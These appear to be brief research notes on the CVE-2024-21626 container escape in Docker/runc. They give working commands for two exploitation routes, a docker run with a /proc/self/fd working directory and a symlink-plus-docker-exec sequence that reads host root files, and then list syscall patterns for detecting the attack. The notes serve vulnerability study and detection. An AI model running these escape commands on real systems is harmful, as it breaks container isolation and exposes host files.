Docker Escape Vulnerability CVE-2024-21626

Research link: https://nitroc.org/en/posts/cve-2024-21626-illustrated/#exploit-via-setting-working-directory-to-procselffdfd

According to the article, it can be exploited in 2 ways:

1) Set the working directory of the container to /proc/self/fd/ (where stands for the file descriptor when opening /sys/fs/cgroup in host filesystem. Usually it’s 7 or 8) when running a container.

2) Create a symlink for /proc/self/fd/ (where stands for the file descriptor when opening /sys/fs/cgroup in host filesystem. Usually it’s 7 or 8). When users execute commands inside the container via docker exec or kubectl exec by setting the working directory to the symlink, attackers can access host filesystem through /proc//cwd, where stands for the PID of the process generated by docker exec or kubectl exec command.

Commands:

1) Exploit via Setting Working Directory to /proc/self/fd/

docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm 

cat ../../../../../../root/root/.txt

2) Docker Exec

Containerised root shell:> ln -sf /proc/self/fd/7/ /foo

Containerised root shell:> ln -sf /proc/self/fd/8/ /bar

Attacker shell:> docker exec -it -w /bar cve-2024-21626 sleep 120

Containerised root shell:> ls -f /proc

Containerised root shell:> cat /proc/NUM/cmdline

Containerised root shell:> ls -la /proc/NUM/cwd/../../../../root/

Detection:

According to the article:

The exploits have the following characteristics:

• A container will execve(2) a process with a special working directory which starts with /proc/self/fd/.

• A container will create symbolic links via symlink(2) or symlinkat(2) with a special target directory link which starts with /proc/self/fd/.

• A container will open files via open(2), openat(2) or openat2(2) with filenames like /proc/\d+/cwd/.*